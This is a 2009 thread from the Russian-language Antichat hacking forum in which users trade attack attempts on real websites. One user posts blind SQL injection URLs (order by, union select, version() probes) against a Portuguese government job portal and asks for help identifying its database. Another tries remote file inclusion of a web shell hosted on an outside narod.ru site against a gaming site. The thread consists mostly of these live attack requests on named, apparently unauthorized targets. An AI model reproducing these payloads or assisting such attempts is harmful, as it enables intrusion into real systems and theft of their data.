HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.03.2009, 15:30
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Нашёл блинд инж, подобрал поля

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--

так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
 
Ответить с цитированием

  #2  
Старый 26.03.2009, 15:59
Booblekus
Новичок
Регистрация: 26.11.2008
Сообщений: 1
Провел на форуме:
4317

Репутация: 0
По умолчанию

Цитата:
Сообщение от Imperou$  
Нашёл блинд инж, подобрал поля

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--

так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
А почему ты решил что это вообще MySQL?.
 
Ответить с цитированием

  #3  
Старый 26.03.2009, 16:41
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от Booblekus  
А почему ты решил что это вообще MySQL?.
А почему ты спрашиваешь?Посты набиваешь?
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

и

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+3--

и

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2

Догадайся почему.
З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD

Соответственно блинд,разве нет?
 
Ответить с цитированием

  #4  
Старый 25.03.2009, 17:46
serg88
Участник форума
Регистрация: 30.07.2006
Сообщений: 148
Провел на форуме:
789961

Репутация: 215
По умолчанию

Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то

чо тако ??
 
Ответить с цитированием

  #5  
Старый 25.03.2009, 18:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!
 
Ответить с цитированием

  #6  
Старый 25.03.2009, 18:16
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
По умолчанию

Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?
 
Ответить с цитированием

  #7  
Старый 25.03.2009, 18:24
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?
с чего ты взял что там php injection?

Последний раз редактировалось z00MAN; 25.03.2009 в 18:43..
 
Ответить с цитированием

  #8  
Старый 25.03.2009, 18:26
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
По умолчанию

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
 
Ответить с цитированием

  #9  
Старый 25.03.2009, 18:31
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
не факт
не обязательно если выходит ошибка при "page=blalbabla" то есть php injection

Последний раз редактировалось z00MAN; 25.03.2009 в 18:42..
 
Ответить с цитированием

  #10  
Старый 25.03.2009, 20:43
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
Что за ошибка то?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.